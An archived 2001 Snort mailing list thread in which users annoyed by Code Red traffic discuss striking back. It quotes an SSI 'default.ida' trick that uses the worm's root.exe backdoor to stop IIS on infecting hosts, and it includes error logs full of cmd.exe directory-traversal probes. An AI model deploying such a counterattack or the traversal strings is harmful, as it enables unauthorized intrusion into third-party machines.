Snort mailing list archives
Re: Shut them down, I have had enough...
From: "Daniel Holden" <dholden () idsb net>
Date: Wed, 19 Sep 2001 01:04:26 +0100
I too would be very interested in this. I seem to get alot of code red crap from the same sites. I've emailed them but nothing ever happens. I just get their automated email back. Screw them! If they can't take the time to clean their servers then I'm all for sending them something back in return. ----- Original Message ----- From: "Franki" <franki () gshop com au> To: <snort-users () lists sourceforge net> Sent: Wednesday, September 19, 2001 8:03 AM Subject: [Snort-users] Shut them down, I have had enough...
Hi all, I have seen in the past a php script that would shut down infected IIS servers that are trying to infect linux box's I havn't done it, because I didn't really think it was that nice a thing
to
do... This is the one I saw...1) Create a file called default.ida, in there add this: <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"--> On one line, if it wraps in your mail client.... 2) Then in your httpd.conf or similar... add this AddType text/html .ida AddHandler server-parsed .idabut I checked my personal server this morning and the httpd error log
looks
like this. (see the end of the email) anyway, I'd like to setup the server to shutdown any IIS box that asks for cmd.exe or root.exe Does anyone know how this can be done using either perl or php??? has anyone already done it? if so where can I find it??? I am tired of this, I have a very limited bandwidth, and even if it isn't doing any damage, its chewing up the bandwidth.. and costing me money, as far as I am now concerned, they have three choices, either patch their server, pay my bandwidth bill, or get their servers shut down alot... Any help would be much appreciated. Regards Frank Perth WA [Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida [Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe [Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe [Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [root@mail httpd]# tail -50 error_log [Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist:
/var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi nnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c ../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32 /cmd.exe [Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Sizing a machine for Snort Muscat, Tyrone J. (Sep 18)
- Re: Sizing a machine for Snort Erek Adams (Sep 18)
- Shut them down, I have had enough... Franki (Sep 19)
- Re: Shut them down, I have had enough... Daniel Holden (Sep 19)
- Shut them down, I have had enough... Franki (Sep 19)
- Re: Sizing a machine for Snort Erek Adams (Sep 18)